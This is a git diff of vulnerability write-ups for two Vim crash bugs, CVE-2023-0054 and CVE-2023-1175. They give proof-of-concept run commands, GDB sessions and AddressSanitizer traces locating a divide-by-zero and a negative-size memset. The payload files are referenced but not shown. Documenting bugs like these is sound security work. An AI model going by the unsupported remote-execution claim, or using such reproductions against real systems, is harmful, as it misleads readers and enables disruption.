@@ -1,108 +1,108 @@ -# 漏洞CVE-2023-0054 -## Description -Divide By Zero in function adjust_skipcol at move.c:1978 - -## Vim Version -```shell -git log -commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD) -``` - -## Proof of Concept -```shell -./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! -Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! -Floating point exception -``` - -# GDB - -``` -gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! -─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[Thread debugging using libthread_db enabled] -Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". - -Program received signal SIGFPE, Arithmetic exception. -0x0000555555f020d7 in adjust_skipcol () at move.c:1978 -1978 row += col / width2; -─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 0x0000555555f020c4 adjust_skipcol+4025 mov $0x45c1,%edx - 0x0000555555f020c9 adjust_skipcol+4030 mov 0xd54f20(%rip),%rax # 0x555556c56ff0 - 0x0000555555f020d0 adjust_skipcol+4037 mov %edx,%fs:(%rax) - 0x0000555555f020d3 adjust_skipcol+4040 mov -0x2c(%rbp),%eax - 0x0000555555f020d6 adjust_skipcol+4043 cltd - 0x0000555555f020d7 adjust_skipcol+4044 idivl -0x20(%rbp) - 0x0000555555f020da adjust_skipcol+4047 add %eax,-0x28(%rbp) - 0x0000555555f020dd adjust_skipcol+4050 mov -0x2c(%rbp),%eax - 0x0000555555f020e0 adjust_skipcol+4053 cltd - 0x0000555555f020e1 adjust_skipcol+4054 idivl -0x20(%rbp) -─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── 
Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���─────────────────────────── - rax 0x0000000000000008 rbx 0x0000555556d8e320 rcx 0x0000555556d968f8 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 - rbp 0x00007fffffff8e80 rsp 0x00007fffffff8e50 r8 0x0000000000000007 r9 0x000062100002e0ff r10 0x00007ffff65a1000 r11 0x00000000000000f8 - r12 0x00000000fffffff8 r13 0x00000ffffffff1fa r14 0x00007fffffff8fd0 r15 0x00007fffffffb750 rip 0x0000555555f020d7 eflags [ IF RF ] - cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 -─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 1973 col -= width1; - 1974 ++row; - 1975 } - 1976 if (col > width2) - 1977 { - 1978 row += col / width2; - 1979 col = col % width2; - 1980 } - 1981 if (row >= curwin->w_height) - 1982 { -─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 -[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642 -[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167 -[3] from 0x0000555555b0626f in 
do_exedit+4927 at ex_docmd.c:7187 -[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834 -[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580 -[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993 -[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587 -[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274 -[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614 -[+] -─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 -─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1 -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ->>> bt -#0 0x0000555555f020d7 in adjust_skipcol () at move.c:1978 -#1 0x00005555558e44b0 in beginline (flags=6) at edit.c:2642 -#2 0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167 -#3 0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187 -#4 0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834 -#5 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 -#6 0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 -#7 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587 -#8 0x00005555568f8e11 in do_window (nchar=14, 
Prenum=0, xchar=0) at window.c:274
-#9 0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614
-#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938
-#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887
-#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850
-#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768
-#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c , cookie=0x7fffffffd470) at ex_docmd.c:2580
-#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c , cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993
-#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672
-#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818
-#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163
-#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189
-#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
-#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
-#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587
-#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 ) at main.c:3146
-#24 0x0000555556ac5d79 in vim_main2 () at main.c:782
-#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433
-```
-
-## Impact
-
+# 漏洞CVE-2023-0054
+## Description
+Divide By Zero in function 
adjust_skipcol at move.c:1978 + +## Vim Version +```shell +git log +commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD) +``` + +## Proof of Concept +```shell +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +Floating point exception +``` + +# GDB + +``` +gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGFPE, Arithmetic exception. +0x0000555555f020d7 in adjust_skipcol () at move.c:1978 +1978 row += col / width2; +─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 0x0000555555f020c4 adjust_skipcol+4025 mov $0x45c1,%edx + 0x0000555555f020c9 adjust_skipcol+4030 mov 0xd54f20(%rip),%rax # 0x555556c56ff0 + 0x0000555555f020d0 adjust_skipcol+4037 mov %edx,%fs:(%rax) + 0x0000555555f020d3 adjust_skipcol+4040 mov -0x2c(%rbp),%eax + 0x0000555555f020d6 adjust_skipcol+4043 cltd + 0x0000555555f020d7 adjust_skipcol+4044 idivl -0x20(%rbp) + 0x0000555555f020da adjust_skipcol+4047 add %eax,-0x28(%rbp) + 0x0000555555f020dd adjust_skipcol+4050 mov -0x2c(%rbp),%eax + 0x0000555555f020e0 adjust_skipcol+4053 cltd + 0x0000555555f020e1 adjust_skipcol+4054 idivl -0x20(%rbp) +─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Expressions 
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���─────────────────────────── + rax 0x0000000000000008 rbx 0x0000555556d8e320 rcx 0x0000555556d968f8 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 + rbp 0x00007fffffff8e80 rsp 0x00007fffffff8e50 r8 0x0000000000000007 r9 0x000062100002e0ff r10 0x00007ffff65a1000 r11 0x00000000000000f8 + r12 0x00000000fffffff8 r13 0x00000ffffffff1fa r14 0x00007fffffff8fd0 r15 0x00007fffffffb750 rip 0x0000555555f020d7 eflags [ IF RF ] + cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 +─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 1973 col -= width1; + 1974 ++row; + 1975 } + 1976 if (col > width2) + 1977 { + 1978 row += col / width2; + 1979 col = col % width2; + 1980 } + 1981 if (row >= curwin->w_height) + 1982 { +─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 +[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642 +[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167 +[3] from 0x0000555555b0626f in do_exedit+4927 at 
ex_docmd.c:7187 +[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834 +[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580 +[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993 +[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587 +[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274 +[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614 +[+] +─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 +─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1 +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +>>> bt +#0 0x0000555555f020d7 in adjust_skipcol () at move.c:1978 +#1 0x00005555558e44b0 in beginline (flags=6) at edit.c:2642 +#2 0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167 +#3 0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187 +#4 0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834 +#5 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#6 0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 +#7 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587 +#8 0x00005555568f8e11 in do_window (nchar=14, Prenum=0, xchar=0) 
at window.c:274
+#9 0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614
+#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938
+#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887
+#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850
+#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768
+#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c , cookie=0x7fffffffd470) at ex_docmd.c:2580
+#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c , cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993
+#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672
+#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818
+#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163
+#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189
+#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
+#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
+#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587
+#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 ) at main.c:3146
+#24 0x0000555556ac5d79 in vim_main2 () at main.c:782
+#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433
+```
+
+## Impact
+ This vulnerability is capable of crashing software, modify memory, and possible remote 
execution.
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-1175/README.md b/cve/vim/2023/CVE-2023-1175/README.md
index eba25fc4197ea6a033ac3c0eb05bdd42a9e225c2..56e610cddfaea03f790336c70a8d90b8412e3947 100644
--- a/cve/vim/2023/CVE-2023-1175/README.md
+++ b/cve/vim/2023/CVE-2023-1175/README.md
@@ -1,134 +1,134 @@
-## Description
-Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468
-## vim version
-```bash
-git log
-commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD)
-```
-## POC
-```bash
-./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
-=================================================================
-==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1)
- #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
- #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468
- #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
- #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
- #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
- #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
- #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
- #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
- #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
- #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
- #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
- #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
- #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
- #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
- #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
- #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
- #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
- #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
- #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
- #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
- #20 0x555556ac9ab9 in vim_main2 
/home/fuzz/vim/src/main.c:782
- #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
- #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
- #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d)
-
-0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272)
-allocated by thread T0 here:
- #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
- #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246
- #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151
- #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464
- #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
- #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
- #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
- #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
- #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
- #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
- #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
- #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
- #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
- #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
- #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
- #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
- #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
- #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
- #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
- #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
- #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
- #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
- #22 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
- #23 0x555556ac6f8f in main 
/home/fuzz/vim/src/main.c:433 - #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 - -SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset -==1962298==ABORTING -``` -[poc_nsp01_s.dat](poc_nsp01_s.dat) -## GDB -```bash -gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! - -─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[Thread debugging using libthread_db enabled] -Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". - -Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468 -1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); -─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 0x00005555562c5854 yank_copy_line+883 je 0x5555562c585e - 0x00005555562c5856 yank_copy_line+885 mov %rdx,%rdi - 0x00005555562c5859 yank_copy_line+888 callq 0x555555696b30 <__asan_report_store8@plt> - 0x00005555562c585e yank_copy_line+893 mov -0x18(%rbp),%rdx - 0x00005555562c5862 yank_copy_line+897 mov %rdx,(%rax) -!0x00005555562c5865 yank_copy_line+900 mov -0x28(%rbp),%rax - 0x00005555562c5869 yank_copy_line+904 mov %rax,%rdx - 0x00005555562c586c yank_copy_line+907 mov %rdx,%rax - 0x00005555562c586f yank_copy_line+910 shr $0x3,%rax - 0x00005555562c5873 yank_copy_line+914 add $0x7fff8000,%rax -─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[1] break at 
0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time -─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Registers ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - rax 0x0000602000007230 rbx 0x0000555556d935e0 rcx 0x0000000000000000 rdx 0x0000602000007250 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007fffffffbb00 rsp 0x00007fffffffbac0 - r8 0x00007ffff7fb8000 r9 0x0000000000000002 r10 0x0000602000007240 r11 0x00000000000000e0 r12 0x00007fffffffbd30 r13 0x00000ffffffff772 r14 0x00007fffffffbb90 r15 0x0000555556d86b60 - rip 0x00005555562c5865 eflags [ PF ZF IF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 -─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 1463 bd->endspaces = 0; - 1464 if ((pnew = alloc(bd->startspaces + bd->endspaces + bd->textlen + 1)) - 1465 == NULL) - 1466 return FAIL; - 1467 y_current->y_array[y_idx] = pnew; -!1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); - 1469 pnew += bd->startspaces; - 1470 
mch_memmove(pnew, bd->textstart, (size_t)bd->textlen); - 1471 pnew += bd->textlen; - 1472 vim_memset(pnew, ' ', (size_t)bd->endspaces); -─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 -[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290 -[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742 -[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754 -[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123 -[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960 -[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887 -[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850 -[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768 -[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580 -[+] -─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 -─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0 -loc pnew = 0x602000007250 "\276\276": 190 '\276' -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ->>> p 
bd->startspaces
-$2 = -1
->>>
-```
-## Impact
-This vulnerability is capable of crashing software, modify memory, and possible remote execution.
+## Description
+Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468
+## vim version
+```bash
+git log
+commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD)
+```
+## POC
+```bash
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
+=================================================================
+==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1)
+ #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
+ #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468
+ #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
+ #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
+ #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
+ #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
+ #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
+ #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+ #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
+ #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+ #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+ #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+ #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+ #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
+ #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+ #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+ #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+ #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+ #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 
+ #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
+ #20 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
+ #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
+ #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
+ #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d)
+
+0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272)
+allocated by thread T0 here:
+ #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
+ #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246
+ #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151
+ #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464
+ #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
+ #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
+ #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
+ #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
+ #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
+ #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+ #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
